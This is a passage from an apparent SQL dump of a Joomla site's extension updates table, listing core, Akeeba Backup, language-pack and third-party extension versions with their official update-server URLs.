package','','pkg_akeeba','package','',0,'8.2.3','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-2-3.html',''),(34316,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34317,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34318,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34319,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34320,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.2.3','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-2-3.html',''),(34321,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34322,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34323,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34324,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34325,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.2.3','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-2-3.html',''),(34326,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34327,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34328,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34329,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.2.3','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-2-3.html',''),(34330,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34331,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34332,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34333,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34334,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.2.3','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-2-3.html',''),(34335,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34336,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34337,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34338,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34339,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.2.3','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-2-3.html',''),(34340,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34341,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34342,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(34343,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(34344,3,0,'Basque','','pkg_eu-ES','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/eu-ES_details.xml','',''),(34345,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(34346,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(34347,3,0,'Chinese, Simplified','','pkg_zh-CN','package','',0,'3.10.6.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(34348,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(34349,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(34350,3,0,'Danish','','pkg_da-DK','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(34351,3,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(34352,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(34353,3,0,'English, Australia','','pkg_en-AU','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(34354,3,0,'English, Canada','','pkg_en-CA','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(34355,3,0,'English, New Zealand','','pkg_en-NZ','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(34356,3,0,'English, USA','','pkg_en-US','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(34357,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(34358,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(34359,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(34360,3,0,'French','','pkg_fr-FR','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(34361,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(34362,3,0,'German','','pkg_de-DE','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(34363,3,0,'German, Austria','','pkg_de-AT','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(34364,3,0,'German, Liechtenstein','','pkg_de-LI','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(34365,3,0,'German, Luxembourg','','pkg_de-LU','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(34366,3,0,'German, Switzerland','','pkg_de-CH','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(34367,3,0,'Greek','','pkg_el-GR','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(34368,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(34369,3,0,'Italian','','pkg_it-IT','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(34370,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(34371,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(34372,3,0,'Latvian','','pkg_lv-LV','package','',0,'3.9.25.2','','https://update.joomla.org/language/details3/lv-LV_details.xml','',''),(34373,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(34374,3,0,'Norwegian Bokmål','','pkg_nb-NO','package','',0,'3.10.0.1','','https://update.joomla.org/language/details3/nb-NO_details.xml','',''),(34375,3,0,'Persian Farsi','','pkg_fa-IR','package','',0,'3.10.11.2','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(34376,3,0,'Polish','','pkg_pl-PL','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(34377,3,0,'Portuguese, Brazil','','pkg_pt-BR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(34378,3,0,'Portuguese, Portugal','','pkg_pt-PT','package','',0,'3.9.29.2','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(34379,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(34380,3,0,'Russian','','pkg_ru-RU','package','',0,'3.10.9.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(34381,3,0,'Serbian, Cyrillic','','pkg_sr-RS','package','',0,'3.10.2.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(34382,3,0,'Serbian, Latin','','pkg_sr-YU','package','',0,'3.10.2.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(34383,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.10.5.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(34384,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(34385,3,0,'Spanish','','pkg_es-ES','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(34386,3,0,'Spanish, Colombia','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(34387,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(34388,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(34389,3,0,'Tamil, India','','pkg_ta-IN','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(34390,3,0,'Thai','','pkg_th-TH','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(34391,3,0,'Turkish','','pkg_tr-TR','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/tr-TR_details.xml','',''),(34392,3,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.10.2.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(34393,3,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(34394,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(34395,20,0,'RokSprocket Module','','mod_roksprocket','module','',0,'2.1.28','0802','https://updates.rockettheme.com/joomla/138/b61e70db','',''),(34396,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','https://updates.rockettheme.com/joomla/138/2084920890','',''),(34397,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.46','0802','https://updates.rockettheme.com/joomla/286/21ffe006','',''),(34398,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','https://updates.rockettheme.com/joomla/286/326466299','',''),(34399,20,0,'RokBooster Plugin','','rokbooster','plugin','system',0,'1.1.19','0802','https://updates.rockettheme.com/joomla/287/cb577720','',''),(34400,20,0,'RokBox Plugin','','rokbox','plugin','system',0,'2.0.16','0802','https://updates.rockettheme.com/joomla/301/dfc993d8','',''),(34401,20,0,'RokCandy Extension','','rokcandy','plugin','system',0,'2.0.4','0802','https://updates.rockettheme.com/joomla/302/2df8a4e2','',''),(34402,20,0,'RokGallery','','','component','',0,'2.46','0802','https://updates.rockettheme.com/joomla/313/1985305838','',''),(34403,20,0,'RokWeather','','','module','',0,'2.0.4','0802','https://updates.rockettheme.com/joomla/313/1307741342','',''),(34404,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','https://updates.rockettheme.com/joomla/313/1301311221','',''),(34405,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','https://updates.rockettheme.com/joomla/381/337128173','',''),(34406,20,0,'RokCommon','','pkg_rokcommon','package','',0,'3.2.9','0802','https://updates.rockettheme.com/joomla/559/1033ef39','',''),(34407,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(34408,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(34409,57,0,'Basque','','pkg_eu-ES','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/eu-ES_details.xml','',''),(34410,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(34411,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(34412,57,0,'Chinese, Simplified','','pkg_zh-CN','package','',0,'3.10.6.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(34413,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(34414,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(34415,57,0,'Danish','','pkg_da-DK','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(34416,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(34417,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(34418,57,0,'English, Australia','','pkg_en-AU','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(34419,57,0,'English, Canada','','pkg_en-CA','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(34420,57,0,'English, New Zealand','','pkg_en-NZ','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(34421,57,0,'English, USA','','pkg_en-US','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(34422,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(34423,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(34424,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(34425,57,0,'French','','pkg_fr-FR','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(34426,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(34427,57,0,'German','','pkg_de-DE','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(34428,57,0,'German, Austria','','pkg_de-AT','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(34429,57,0,'German, Liechtenstein','','pkg_de-LI','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(34430,57,0,'German, Luxembourg','','pkg_de-LU','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(34431,57,0,'German, Switzerland','','pkg_de-CH','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(34432,57,0,'Greek','','pkg_el-GR','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(34433,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(34434,57,0,'Italian','','pkg_it-IT','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(34435,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(34436,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(34437,57,0,'Latvian','','pkg_lv-LV','package','',0,'3.9.25.2','','https://update.joomla.org/language/details3/lv-LV_details.xml','',''),(34438,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(34439,57,0,'Norwegian Bokmål','','pkg_nb-NO','package','',0,'3.10.0.1','','https://update.joomla.org/language/details3/nb-NO_details.xml','',''),(34440,57,0,'Persian Farsi','','pkg_fa-IR','package','',0,'3.10.11.2','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(34441,57,0,'Polish','','pkg_pl-PL','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(34442,57,0,'Portuguese, Brazil','','pkg_pt-BR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(34443,57,0,'Portuguese, Portugal','','pkg_pt-PT','package','',0,'3.9.29.2','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(34444,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(34445,57,0,'Russian','','pkg_ru-RU','package','',0,'3.10.9.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(34446,57,0,'Serbian, Cyrillic','','pkg_sr-RS','package','',0,'3.10.2.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(34447,57,0,'Serbian, Latin','','pkg_sr-YU','package','',0,'3.10.2.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(34448,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.10.5.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(34449,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(34450,57,0,'Spanish','','pkg_es-ES','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(34451,57,0,'Spanish, Colombia','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(34452,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(34453,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(34454,57,0,'Tamil, India','','pkg_ta-IN','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(34455,57,0,'Thai','','pkg_th-TH','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(34456,57,0,'Turkish','','pkg_tr-TR','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/tr-TR_details.xml','',''),(34457,57,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.10.2.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(34458,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(34459,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(34460,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.2.3','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-2-3.html',''),(34461,122,0,'Google Structured Data Free','','gsd','plugin','system',0,'5.1.6','','https://static.tassos.gr/update/gsdfree?type=.xml','https://www.tassos.gr/releases/google-structured-data/google-structured-data-5-1-6?format=html',''),(34462,129,0,'JCE 2.9.32','Installation package for Joomla! 3.x and 4.x','pkg_jce','package','',0,'2.9.32','','https://cdn.joomlacontenteditor.net/updates/xml/editor/pkg_jce.xml','https://www.joomlacontenteditor.net/news/jce-pro-2-9-32-released',''),(34463,130,0,'T3 System Plugin','','t3','plugin','system',0,'3.1.2','','http://update.joomlart.com/service/tracking/j16/plg_system_t3.xml','http://www.joomlart.com/update-steps',''),(34464,135,0,' Phoca Gallery ',' Phoca Gallery is an efficient image gallery extension for Joomla! CMS. ','com_phocagallery','component','',1,'4.4.3','','https://raw.githubusercontent.com/PhocaCz/PhocaGallery/master/manifest.xml','http://www.phoca.cz/version/index.php?phocagallery=4.4.3',''),(34465,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34466,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34467,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.2.3','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-2-3.html',''),(34468,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34469,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34470,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34471,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.2.3','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-2-3.html',''),(34472,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34473,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34474,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34475,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.2.3','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-2-3.html',''),(34476,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34477,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34478,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.2.3','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-2-3.html',''),(34479,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34480,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34481,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34482,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34483,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.2.3','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-2-3.html',''),(34484,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34485,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34486,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34487,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34488,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34489,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34490,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.2.4','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-2-4.html',''),(34491,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34492,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34493,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34494,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.2.4','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-2-4.html',''),(34495,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34496,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34497,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34498,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.2.4','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-2-4.html',''),(34499,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34500,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34501,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.2.4','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-2-4.html',''),(34502,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34503,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34504,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34505,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34506,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.2.4','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-2-4.html',''),(34507,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34508,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34509,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34510,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34511,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.2.4','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-2-4.html',''),(34512,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34513,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34514,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34515,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.2.4','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-2-4.html',''),(34516,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34517,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34518,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34519,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34520,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.2.5','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-2-5.html',''),(34521,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34522,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34523,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34524,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.2.6','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-2-6.html',''),(34525,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34526,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34527,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34528,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.2.6','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-2-6.html',''),(34529,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34530,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34531,67,0,'Akeeba Backup Core 